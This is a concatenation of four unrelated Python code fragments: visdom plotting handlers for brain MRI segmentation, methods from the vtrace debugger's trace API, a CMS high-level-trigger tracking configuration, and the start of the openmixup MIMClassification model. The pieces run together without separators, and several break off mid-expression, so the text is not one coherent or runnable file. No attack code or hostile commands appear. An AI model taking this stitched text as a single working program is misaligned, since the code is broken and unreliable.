Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Training Segmentation Ground Truth Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Training Ground Truth Patches Process {}".format( run_config.local_rank)}}, every=500), Event.ON_TRAIN_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Validation Segmentation Ground Truth Batch Process {}".format( run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Validation Ground Truth Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_VALID_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Test Segmentation Ground Truth Batch Process {}".format( run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Test Ground Truth Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Training Label Map Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Training Label Map Patches Process {}".format( run_config.local_rank)}}, every=500), Event.ON_TRAIN_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Validation Label Map Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Validation Label Map Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_VALID_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Test Label Map Batch Process {}".format(run_config.local_rank), PlotType.IMAGES_PLOT, params={"nrow": 4, "opts": {"store_history": True, "title": "Test Label Map Patches Process {}".format( run_config.local_rank)}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Input Intensity Histogram", PlotType.HISTOGRAM_PLOT, params={ "opts": {"title": "Inputs Intensity Histogram", "store_history": True, "numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "Background Input Intensity Histogram", PlotType.HISTOGRAM_PLOT, params={"opts": {"title": "Background Input Intensity Histogram", "store_history": True, "numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "CSF Input Intensity Histogram", PlotType.HISTOGRAM_PLOT, params={"opts": {"title": "CSF Input Intensity Histogram", "store_history": True, "numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "GM Input Intensity Histogram", PlotType.HISTOGRAM_PLOT, params={"opts": {"title": "GM Input Intensity Histogram", "store_history": True, "numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "WM Input Intensity Histogram", PlotType.HISTOGRAM_PLOT, params={"opts": {"title": "WM Input Intensity Histogram", "store_history": True, "numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "Mean Hausdorff Distance", PlotType.LINE_PLOT, params={"opts": {"title": "Mean Hausdorff Distance", "legend": ["Test"]}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "Metric Table", PlotType.TEXT_PLOT, params={"opts": {"title": "Metric Table"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "Per-Dataset Metric Table", PlotType.TEXT_PLOT, params={"opts": {"title": "Per-Dataset Metric Table"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "Confusion Matrix", PlotType.HEATMAP_PLOT, params={ "opts": {"columnnames": ["VM", "GM", "CSF", "Background"], "rownames": ["Background", "CSF", "GM", "WM"], "title": "Confusion Matrix"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler(PlotCustomVariables(visdom_logger, "iSEG Confusion Matrix", PlotType.HEATMAP_PLOT, params={ "opts": {"columnnames": ["VM", "GM", "CSF", "Background"], "rownames": ["Background", "CSF", "GM", "WM"], "title": "iSEG Confusion Matrix"}}, every=1), Event.ON_TEST_EPOCH_END) \ .with_event_handler( PlotCustomVariables(visdom_logger, "MRBrainS Confusion Matrix", PlotType.HEATMAP_PLOT, params={"opts": {"columnnames": ["VM", "GM", "CSF", "Background"], "rownames": ["Background",
method on return'd breakpoint objects as they may be remote and would then be *coppies* of the bp objects. (use the trace's setBreakpointCode() instead). """ return self.bpbyid.get(id) def getBreakpointByAddr(self, va): ''' Return the breakpoint object (or None) for a given virtual address. ''' return self.breakpoints.get(va) def getBreakpoints(self): """ Return a list of the current breakpoints. """ return self.bpbyid.values() def getBreakpointEnabled(self, bpid): """ An accessor method for returning if a breakpoint is currently enabled. NOTE: code which wants to be remote-safe should use this """ bp = self.getBreakpoint(bpid) if bp is None: raise Exception("Breakpoint %d Not Found" % bpid) return bp.isEnabled() def setBreakpointEnabled(self, bpid, enabled=True): """ An accessor method for setting a breakpoint enabled/disabled. NOTE: code which wants to be remote-safe should use this """ bp = self.getBreakpoint(bpid) if bp is None: raise Exception("Breakpoint %d Not Found" % bpid) if not enabled: # To catch the "disable" of fastbreaks... bp.deactivate(self) return bp.setEnabled(enabled) def setBreakpointCode(self, bpid, pystr): """ Because breakpoints are potentially on the remote debugger and code is not pickleable in python, special access methods which takes strings of python code are necessary for the vdb interface to quick script breakpoint code. Use this method to set the python code for this breakpoint. """ bp = self.getBreakpoint(bpid) if bp is None: raise Exception("Breakpoint %d Not Found" % bpid) bp.setBreakpointCode(pystr) def getBreakpointCode(self, bpid): """ Return the python string of user specified code that will run when this breakpoint is hit. """ bp = self.getBreakpoint(bpid) if bp is not None: return bp.getBreakpointCode() return None def call(self, address, args, convention=None): """ Setup the "stack" and call the target address with the following arguments. If the argument is a string or a buffer, copy that into memory and hand in the argument. The current state of ALL registers are returned as a dictionary at the end of the call... Additionally, a "convention" string may be specified that the underlying platform may be able to interpret... """ self.requireNotRunning() return self.platformCall(address, args, convention) def registerNotifier(self, event, notifier): """ Register a notifier who will be called for various events. See NOTIFY_* constants for handler hooks. """ nlist = self.notifiers.get(event, None) if nlist: nlist.append(notifier) else: nlist = [] nlist.append(notifier) self.notifiers[event] = nlist def deregisterNotifier(self, event, notifier): nlist = self.notifiers.get(event, []) if notifier in nlist: nlist.remove(notifier) def getNotifiers(self, event): return self.notifiers.get(event, []) def requireNotExited(self): ''' Call in a method that requires the trace to have not exited. ''' if self.exited: raise Exception('ERROR - Request invalid for trace which exited') def requireNotRunning(self): ''' Call in a method that requires the debugger the be attached and not running. ''' self.requireAttached() if self.isRunning(): raise Exception('ERROR - trace is running; use "break" before running the specified command') def requireAttached(self): ''' Call in a method that requires the debugger to be attached. ''' if not self.attached: raise Exception('ERROR - attach to a process first') def getFds(self): """ Get a list of (fd, type, bestname) pairs. This is MOSTLY useful for HUMON consumtion... or giving HUMONs consumption... """ self.requireNotRunning() if not self.fds: self.fds = self.platformGetFds() return self.fds def getMemoryMaps(self): """ Return a list of the currently mapped memory for the target process. This is acomplished by calling the platform's platformGetMaps() mixin method. This will also cache the results until CONTINUE. The format is (addr, len, perms, file). """ self.requireNotRunning() if not self.mapcache: self.mapcache = self.platformGetMaps() return self.mapcache def getMemoryFault(self): ''' If the most receent event is a memory access error, this API will return a tuple of (<addr>, <perm>) on supported platforms. Otherwise, a (None, None) will result. Example: import envi.memory as e_mem vaddr, vperm = trace.getMemoryFault() if vaddr is not None: print('Memory Fault At: 0x%.8x (perm: %d)' % (vaddr, vperm)) ''' return self.platformGetMemFault() def isAttached(self): ''' Return true or false if this trace's target processing is attached. ''' return self.attached def isRunning(self): ''' Return true or false if this trace's target process is running. ''' return self.running def hasExited(self): ''' Return true or false if this trace's target process has exited. ''' return self.exited def isRemote(self): ''' Return true or false if this trace's target process is a CobraProxy object to a trace on another system. ''' return False def enableAutoContinue(self, event): """ Put the tracer object in to AutoContinue mode for the specified event. To make all events continue running see RunForever mode in setMode(). """ if event not in self.auto_continue: self.auto_continue.append(event) def disableAutoContinue(self, event): """ Disable Auto Continue for the specified event. """ if event in self.auto_continue: self.auto_continue.remove(event) def getAutoContinueList(self): """ Retrieve the list of vtrace notification events that will be auto-continued. """ return list(self.auto_continue) def parseExpression(self, expression): """ Parse a python expression with many useful helpers mapped into the execution namespace. Example: trace.parseExpression("ispoi(ecx+ntdll.RtlAllocateHeap)") """ locs = VtraceExpressionLocals(self) return long(e_expr.evaluate(expression, locs)) def sendBreak(self): """ Send an asynchronous break signal to the target process. This is only valid if the target is actually running... """ self.requireAttached() self.setMode("RunForever", False) self.setMeta("ShouldBreak", True) self.platformSendBreak() time.sleep(0.01) # If we're non-blocking, we gotta wait... if self.getMode("NonBlocking", True): while self.isRunning(): time.sleep(0.01) def getStackTrace(self): """ Returns a list of (instruction pointer, stack frame) tuples. If stack tracing results in an error, the error entry will be (-1, -1). Otherwise most platforms end up with 0, 0 as the top stack frame """ # FIXME thread id argument! return self.archGetStackTrace() def getThreads(self): """ Get a dictionary of <threadid>:<tinfo> pairs where tinfo is platform dependant, but is typically either the top of the stack for that thread, or the TEB on win32 """ if not self.threadcache: self.threadcache = self.platformGetThreads() return self.threadcache def getCurrentThread(self): ''' Return the thread id of the currently selected thread. ''' return self.getMeta('ThreadId') def selectThread(self, threadid): """ Set the "current thread" context to the given thread id. (For example stack traces and register values will depend on the current thread context). By default the thread responsible for an "interesting event" is selected. """ if threadid not in self.getThreads(): raise Exception("ERROR: Invalid threadid chosen: %d" % threadid) self.requireNotRunning() self.platformSelectThread(threadid) self.setMeta("ThreadId", threadid) def isThreadSuspended(self, threadid): """ Used to determine if a thread is suspended. """ return self.sus_threads.get(threadid, False) def suspendThread(self, threadid): """ Suspend a thread by ID. This will mean that on continuing the trace, the suspended thread will not be scheduled. """ self.requireNotRunning() if self.sus_threads.get(threadid): raise Exception("The specified thread is already suspended") if threadid not in self.getThreads().keys(): raise Exception("There is no thread %d!" % threadid) self.platformSuspendThread(threadid) self.sus_threads[threadid] = True def resumeThread(self, threadid): """ Resume a suspended thread. """ self.requireNotRunning() if not self.sus_threads.get(threadid): raise Exception("The specified thread is not suspended") self.platformResumeThread(threadid) self.sus_threads.pop(threadid) def injectThread(self, pc): """ Create a new thread inside the target process. This thread will begin execution on the next process run(). """ self.requireNotRunning() #self.platformInjectThread(pc) pass def joinThread(self, threadid): ''' Run the trace in a loop until the specified thread exits. ''' self.setMode('RunForever', True) self._join_thread = threadid # Temporarily make run/wait blocking nb = self.getMode('NonBlocking') self.setMode('NonBlocking', False) self.run() self.setMode('NonBlocking', nb) def getStructNames(self, namespace=None): ''' This method returns either the structure names, or the structure namespaces that the target tracer is aware of. If "namespace" is specified, it is structures within that namespace, otherwise it is "known namespaces" Example: namespaces = trace.getStructNames() ntdll_structs = trace.getStructNames(namespace='ntdll') ''' if namespace: return self.vsbuilder.getVStructNames(namespace=namespace) return self.vsbuilder.getVStructNamespaceNames() def getStruct(self, sname, va=None): """ Retrieve a vstruct structure optionally populated with memory from the specified address. Returns a standard vstruct object. """ # Check if we need to parse symbols for a library libbase = sname.split('.')[0] self._loadBinaryNorm(libbase) if self.vsbuilder.hasVStructNamespace(libbase): vs = self.vsbuilder.buildVStruct(sname) # FIXME this is deprecated and should die... else: vs = vstruct.getStructure(sname) if vs is None: return None if va is None: return vs bytez = self.readMemory(va, len(vs)) vs.vsParse(bytez) return vs def setVariable(self, name, value): """ Set a named variable in the trace which may be used in subsequent VtraceExpressions. Example: trace.setVariable("whereiam", trace.getProgramCounter()) """ self.localvars[name] =
# /dev/CMSSW_8_0_0/GRun/V135 (CMSSW_8_0_12) import FWCore.ParameterSet.Config as cms HLTConfigVersion = cms.PSet( tableName = cms.string('/dev/CMSSW_8_0_0/GRun/V135') ) HLTPSetInitialStepTrajectoryFilterBase = cms.PSet( ComponentType = cms.string( "CkfBaseTrajectoryFilter" ), minimumNumberOfHits = cms.int32( 3 ), chargeSignificance = cms.double( -1.0 ), minPt = cms.double( 0.2 ), nSigmaMinPt = cms.double( 5.0 ), minHitsMinPt = cms.int32( 3 ), maxLostHits = cms.int32( 999 ), maxConsecLostHits = cms.int32( 1 ), maxNumberOfHits = cms.int32( 100 ), maxLostHitsFraction = cms.double( 0.1 ), constantValueForLostHitsFractionFilter = cms.double( 2.0 ), minNumberOfHitsPerLoop = cms.int32( 4 ), extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ), minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ), maxCCCLostHits = cms.int32( 2 ), seedExtension = cms.int32( 0 ), strictSeedExtension = cms.bool( False ), seedPairPenalty = cms.int32( 0 ), minNumberOfHitsForLoopers = cms.int32( 13 ) ) HLTPSetInitialStepTrajectoryBuilder = cms.PSet( ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ), bestHitOnly = cms.bool( True ), propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ), trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ), inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ), useSameTrajFilter = cms.bool( True ), maxCand = cms.int32( 3 ), intermediateCleaning = cms.bool( True ), lostHitPenalty = cms.double( 30.0 ), MeasurementTrackerName = cms.string( "" ), lockHits = cms.bool( True ), TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ), foundHitBonus = cms.double( 5.0 ), updator = cms.string( "hltESPKFUpdator" ), alwaysUseInvalidHits = cms.bool( True ), requireSeedHitsInRebuild = cms.bool( True ), keepOriginalIfRebuildFails = cms.bool( False ), estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ), propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ), minNrOfHitsForRebuild = cms.int32( 5 ), maxDPhiForLooperReconstruction = cms.double( 2.0 ), maxPtForLooperReconstruction = cms.double( 0.7 ) ) HLTPSetDetachedStepTrajectoryFilterBase = cms.PSet( ComponentType = cms.string( "CkfBaseTrajectoryFilter" ), minimumNumberOfHits = cms.int32( 3 ), chargeSignificance = cms.double( -1.0 ), minPt = cms.double( 0.075 ), nSigmaMinPt = cms.double( 5.0 ), minHitsMinPt = cms.int32( 3 ), maxLostHits = cms.int32( 999 ), maxConsecLostHits = cms.int32( 1 ), maxNumberOfHits = cms.int32( 100 ), maxLostHitsFraction = cms.double( 0.1 ), constantValueForLostHitsFractionFilter = cms.double( 2.0 ), minNumberOfHitsPerLoop = cms.int32( 4 ), extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ), minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ), maxCCCLostHits = cms.int32( 2 ), seedExtension = cms.int32( 0 ), strictSeedExtension = cms.bool( False ), seedPairPenalty = cms.int32( 0 ), minNumberOfHitsForLoopers = cms.int32( 13 ) ) HLTPSetDetachedStepTrajectoryBuilder = cms.PSet( ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ), bestHitOnly = cms.bool( True ), propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ), trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ), inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ), useSameTrajFilter = cms.bool( True ), maxCand = cms.int32( 3 ), intermediateCleaning = cms.bool( True ), lostHitPenalty = cms.double( 30.0 ), MeasurementTrackerName = cms.string( "" ), lockHits = cms.bool( True ), TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ), foundHitBonus = cms.double( 5.0 ), updator = cms.string( "hltESPKFUpdator" ), alwaysUseInvalidHits = cms.bool( False ), requireSeedHitsInRebuild = cms.bool( True ), keepOriginalIfRebuildFails = cms.bool( False ), estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ), propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ), minNrOfHitsForRebuild = cms.int32( 5 ), maxDPhiForLooperReconstruction = cms.double( 2.0 ), maxPtForLooperReconstruction = cms.double( 0.7 ) ) HLTPSetPixelPairStepTrajectoryFilterBase = cms.PSet( ComponentType = cms.string( "CkfBaseTrajectoryFilter" ), minimumNumberOfHits = cms.int32( 3 ), chargeSignificance = cms.double( -1.0 ), minPt = cms.double( 0.1 ), nSigmaMinPt = cms.double( 5.0 ), minHitsMinPt = cms.int32( 3 ), maxLostHits = cms.int32( 999 ), maxConsecLostHits = cms.int32( 1 ), maxNumberOfHits = cms.int32( 100 ), maxLostHitsFraction = cms.double( 0.1 ), constantValueForLostHitsFractionFilter = cms.double( 2.0 ), minNumberOfHitsPerLoop = cms.int32( 4 ), extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ), minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ), maxCCCLostHits = cms.int32( 2 ), seedExtension = cms.int32( 0 ), strictSeedExtension = cms.bool( False ), seedPairPenalty = cms.int32( 0 ), minNumberOfHitsForLoopers = cms.int32( 13 ) ) HLTPSetPixelPairStepTrajectoryBuilder = cms.PSet( ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ), bestHitOnly = cms.bool( True ), propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ), trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ), inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ), useSameTrajFilter = cms.bool( True ), maxCand = cms.int32( 3 ), intermediateCleaning = cms.bool( True ), lostHitPenalty = cms.double( 30.0 ), MeasurementTrackerName = cms.string( "" ), lockHits = cms.bool( True ), TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ), foundHitBonus = cms.double( 5.0 ), updator = cms.string( "hltESPKFUpdator" ), alwaysUseInvalidHits = cms.bool( True ), requireSeedHitsInRebuild = cms.bool( True ), keepOriginalIfRebuildFails = cms.bool( False ), estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ), propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ), minNrOfHitsForRebuild = cms.int32( 5 ), maxDPhiForLooperReconstruction = cms.double( 2.0 ), maxPtForLooperReconstruction = cms.double( 0.7 ) ) HLTPSetMixedStepTrajectoryFilterBase = cms.PSet( ComponentType = cms.string( "CkfBaseTrajectoryFilter" ), minimumNumberOfHits = cms.int32( 3 ), seedPairPenalty = cms.int32( 0 ), chargeSignificance = cms.double( -1.0 ), minPt = cms.double( 0.05 ), nSigmaMinPt = cms.double( 5.0 ), minHitsMinPt = cms.int32( 3 ), maxLostHits = cms.int32( 0 ), maxConsecLostHits = cms.int32( 1 ), maxNumberOfHits = cms.int32( 100 ), maxLostHitsFraction = cms.double( 0.1 ), constantValueForLostHitsFractionFilter = cms.double( 2.0 ), minNumberOfHitsPerLoop = cms.int32( 4 ), extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ), minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ), maxCCCLostHits = cms.int32( 9999 ), seedExtension = cms.int32( 0 ), strictSeedExtension = cms.bool( False ), minNumberOfHitsForLoopers = cms.int32( 13 ) ) HLTPSetMixedStepTrajectoryBuilder = cms.PSet( ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ), bestHitOnly = cms.bool( True ), propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ), trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ), inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ), useSameTrajFilter = cms.bool( True ), maxCand = cms.int32( 2 ), intermediateCleaning = cms.bool( True ), lostHitPenalty = cms.double( 30.0 ), MeasurementTrackerName = cms.string( "" ), lockHits = cms.bool( True ), TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ), foundHitBonus = cms.double( 5.0 ), updator = cms.string( "hltESPKFUpdator" ), alwaysUseInvalidHits = cms.bool( True ), requireSeedHitsInRebuild = cms.bool( True ), keepOriginalIfRebuildFails = cms.bool( False ), estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ), propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ), minNrOfHitsForRebuild = cms.int32( 5 ), maxDPhiForLooperReconstruction = cms.double( 2.0 ), maxPtForLooperReconstruction = cms.double( 0.7 ) ) HLTPSetPixelLessStepTrajectoryFilterBase = cms.PSet( ComponentType = cms.string( "CkfBaseTrajectoryFilter" ), minimumNumberOfHits = cms.int32( 4 ), chargeSignificance = cms.double( -1.0 ), minPt = cms.double( 0.05 ), nSigmaMinPt = cms.double( 5.0 ), minHitsMinPt = cms.int32( 3 ), maxLostHits = cms.int32( 0 ), maxConsecLostHits = cms.int32( 1 ), maxNumberOfHits = cms.int32( 100 ), maxLostHitsFraction = cms.double( 0.1 ), constantValueForLostHitsFractionFilter = cms.double( 1.0 ), minNumberOfHitsPerLoop = cms.int32( 4 ), extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ), minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ), maxCCCLostHits = cms.int32( 9999 ), seedExtension = cms.int32( 0 ), strictSeedExtension = cms.bool( False ), minNumberOfHitsForLoopers = cms.int32( 13 ), seedPairPenalty = cms.int32( 0 ) ) HLTPSetPixelLessStepTrajectoryBuilder = cms.PSet( ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ), bestHitOnly = cms.bool( True ), propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ), trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ), inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ), useSameTrajFilter = cms.bool( True ), maxCand = cms.int32( 2 ), intermediateCleaning = cms.bool( True ), lostHitPenalty = cms.double( 30.0 ), MeasurementTrackerName = cms.string( "" ), lockHits = cms.bool( True ), TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ), foundHitBonus = cms.double( 5.0 ), updator = cms.string( "hltESPKFUpdator" ), alwaysUseInvalidHits = cms.bool( False ), requireSeedHitsInRebuild = cms.bool( True ), keepOriginalIfRebuildFails = cms.bool( False ), estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ), propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ), minNrOfHitsForRebuild = cms.int32( 4 ), maxDPhiForLooperReconstruction = cms.double( 2.0 ), maxPtForLooperReconstruction = cms.double( 0.7 ) ) transferSystem = cms.PSet( destinations = cms.vstring( 'Tier0', 'DQM', 'ECAL', 'EventDisplay', 'Lustre', 'None' ), transferModes = cms.vstring( 'default', 'test', 'emulator' ), streamA = cms.PSet( default = cms.vstring( 'Tier0' ), test = cms.vstring( 'Lustre' ), emulator = cms.vstring( 'Lustre' ) ), streamCalibration = cms.PSet( default = cms.vstring( 'Tier0' ), test = cms.vstring( 'Lustre' ), emulator = cms.vstring( 'None' ) ), streamDQM = cms.PSet( default = cms.vstring( 'DQM' ), test = cms.vstring( 'DQM', 'Lustre' ), emulator = cms.vstring( 'None' ) ), streamDQMCalibration = cms.PSet( default = cms.vstring( 'DQM' ), test = cms.vstring( 'DQM', 'Lustre' ), emulator = cms.vstring( 'None' ) ), streamEcalCalibration = cms.PSet( default = cms.vstring( 'ECAL' ), test = cms.vstring( 'ECAL' ), emulator = cms.vstring( 'None' ) ), streamEventDisplay = cms.PSet( default = cms.vstring( 'EventDisplay', 'Tier0' ), test = cms.vstring( 'EventDisplay', 'Lustre' ), emulator = cms.vstring( 'None' ) ), streamExpressCosmics = cms.PSet( default = cms.vstring( 'Tier0' ), test
<reponame>Westlake-AI/openmixup<gh_stars>1-10 import random import numpy as np import torch from torch.autograd import Variable import torch.nn.functional as F from openmixup.utils import force_fp32, print_log from openmixup.models.utils import Canny, Laplacian, Sobel from .base_model import BaseModel from .. import builder from ..registry import MODELS from ..utils import (cutmix, fmix, mixup, resizemix, saliencymix, smoothmix, attentivemix, puzzlemix, PlotTensor) @MODELS.register_module class MIMClassification(BaseModel): """Image Classification with Mixups and MIM. Args: backbone (dict): Config dict for module of backbone ConvNet. neck_cls (dict): Config dict for neck of classification pooling. neck_mim (dict): Config dict for neck of masked image modeling (MIM) decoder. head_cls (dict): Config dict for head of classification loss functions. head_mim (dict): Config dict for head of MIM loss functions. backbone_k (dict): Config dict for pre-trained backbone. Default: None. mim_target (None or str): Mode of MIM target. Default: None. alpha (float or list): To sample Beta distribution in MixUp methods. Build a list for various mixup methods. Default: 1. mix_mode (str or list): Basice mixUp methods in input space. Similarly, build a list for various mix_mode, and randomly choose one mix_mode for each iter. Default: "mixup". mix_args (dict): Args for manifoldmix, resizeMix, fmix mode. mix_prob (list): List of applying prob for given mixup modes. Default: None. mix_repeat (bool or int): How many time to repeat mixup within a mini-batch. If mix_repeat > 1, mixup with different alpha and shuffle idx. Default: False. pretrained (str, optional): Path to pre-trained weights. Default: None. pretrained_k (str, optional): Path to pre-trained weights for backbone_k. Default: None. loss_weights (dict): Loss weights of classification and MIM losses. """ def __init__(self, backbone, neck_cls=None, neck_mim=None, head_cls=None, head_mim=None, backbone_k=None, mim_target=None, residual=False, alpha=1.0, mix_mode="mixup", mix_args=dict( attentivemix=dict(grid_size=32, top_k=6, beta=8), automix=dict(mask_adjust=0, lam_margin=0), fmix=dict(decay_power=3, size=(32,32), max_soft=0., reformulate=False), manifoldmix=dict(layer=(0, 3)), puzzlemix=dict(transport=True, t_batch_size=None, block_num=5, beta=1.2, gamma=0.5, eta=0.2, neigh_size=4, n_labels=3, t_eps=0.8, t_size=4), resizemix=dict(scope=(0.1, 0.8), use_alpha=True), samix=dict(mask_adjust=0, lam_margin=0.08), ), mix_prob=None, mix_repeat=False, momentum_k=-1, pretrained=None, pretrained_k=None, save_name="MIMcls", loss_weights=dict( decent_weight=[], accent_weight=[], weight_mim=1, weight_cls=1,), init_cfg=None, **kwargs): super(MIMClassification, self).__init__(init_cfg, **kwargs) # networks self.backbone = builder.build_backbone(backbone) assert isinstance(neck_cls, dict) and isinstance(neck_mim, dict) self.neck_cls = builder.build_neck(neck_cls) self.neck_mim = builder.build_neck(neck_mim) assert isinstance(head_cls, dict) and isinstance(head_mim, dict) self.head_cls = builder.build_head(head_cls) self.head_mim = builder.build_head(head_mim) self.head = self.head_cls self.backbone_k = None self.momentum_k = momentum_k if backbone_k is not None: self.backbone_k = builder.build_backbone(backbone_k) for param in self.backbone_k.parameters(): # stop grad k param.requires_grad = False self.momentum_k = min(momentum_k, 1) # mim targets self.mim_target = mim_target self.residual = residual assert self.mim_target in [None, 'canny', 'hog', 'laplacian', 'lbp', 'pretrained', 'sobel',] if self.mim_target == 'canny': self.feat_layer = Canny(non_max_suppression=True, edge_smooth=True) elif self.mim_target == 'laplacian': self.feat_layer = Laplacian(mode='DoG', use_threshold=False) elif self.mim_target == 'sobel': self.feat_layer = Sobel(isotropic=True, use_threshold=False, out_channels=2) # mixup args self.mix_mode = mix_mode if isinstance(mix_mode, list) else [str(mix_mode)] for _mode in self.mix_mode: assert _mode in [ "vanilla", "mixup", "manifoldmix", "cutmix", "fmix", "saliencymix", "smoothmix", "resizemix", "attentivemix", "puzzlemix", ] if _mode == "manifoldmix": assert 0 <= min(mix_args[_mode]["layer"]) and max(mix_args[_mode]["layer"]) < 4 if _mode == "resizemix": assert 0 <= min(mix_args[_mode]["scope"]) and max(mix_args[_mode]["scope"]) <= 1 self.alpha = alpha if isinstance(alpha, list) else [float(alpha)] assert len(self.alpha) == len(self.mix_mode) and len(self.mix_mode) < 6 self.idx_list = [i for i in range(len(self.mix_mode))] self.mix_args = mix_args self.mix_prob = mix_prob if isinstance(mix_prob, list) else None if self.mix_prob is not None: assert len(self.mix_prob) == len(self.alpha) and abs(sum(self.mix_prob)-1e-10) <= 1, \ "mix_prob={}, sum={}, alpha={}".format(self.mix_prob, sum(self.mix_prob), self.alpha) for i in range(1, len(self.mix_prob)): self.mix_prob[i] = self.mix_prob[i] + self.mix_prob[i-1] self.mix_repeat = int(mix_repeat) if int(mix_repeat) > 1 else 1 if self.mix_repeat > 1: print_log("Warning: mix_repeat={} is more than once.".format(self.mix_repeat)) if len(self.mix_mode) < self.mix_repeat: print_log("Warning: the number of mix_mode={} is less than mix_repeat={}.".format( self.mix_mode, self.mix_repeat)) # save plots self.save_name = save_name self.save = False self.ploter = PlotTensor(apply_inv=True) # loss weights self.loss_weights = loss_weights for key in loss_weights.keys(): if not isinstance(loss_weights[key], list): self.loss_weights[key] = float(loss_weights[key]) \ if float(loss_weights[key]) > 0 else 0 self.weight_cls = loss_weights.get("weight_cls", 1.) self.weight_mim = loss_weights.get("weight_mim", 1.) self.cos_annealing = 1. # decent from 1 to 0 as cosine self.init_weights(pretrained=pretrained, pretrained_k=pretrained_k) def init_weights(self, pretrained=None, pretrained_k=None): """Initialize the weights of model. Args: pretrained (str, optional): Path to pre-trained weights. Default: None. pretrained_k (str, optional): Path to pre-trained weights for encoder_k. Default: None. """ # init pre-trained params if pretrained_k is not None: print_log('load pre-training from: 